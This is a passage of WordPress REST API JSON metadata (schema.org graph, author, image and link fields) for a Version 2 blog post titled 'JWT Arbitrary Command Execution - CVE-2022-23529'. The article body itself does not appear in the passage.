2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","datePublished":"2023-01-18T09:27:53+00:00","dateModified":"2024-09-13T08:31:49+00:00","breadcrumb":{"@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#primaryimage","url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max","contentUrl":"http
s:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/clcth9xsyjmro0jrv6j486n47.png?tr=w-1800,c-at_max"},{"@type":"BreadcrumbList","@id":"https:\/\/www.vicarius.io\/blog\/jwt-arbitrary-command-execution-cve-2022-23529#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"JWT Arbitrary Command Execution\u200a-\u200aCVE-2022\u201323529"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 
2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8","name":"versionpan","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","caption":"versionpan"},"url":"https:\/\/version-2.com\/zh\/author\/versionpan\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fUa","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/148637484"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=61142"}],"version-history":[{"count":6,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142\/revisions"}],"predecessor-version":[{"id":69413,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/61142\/revisions\/69413"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=61142"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=61142"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=61142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\
/{rel}","templated":true}]}}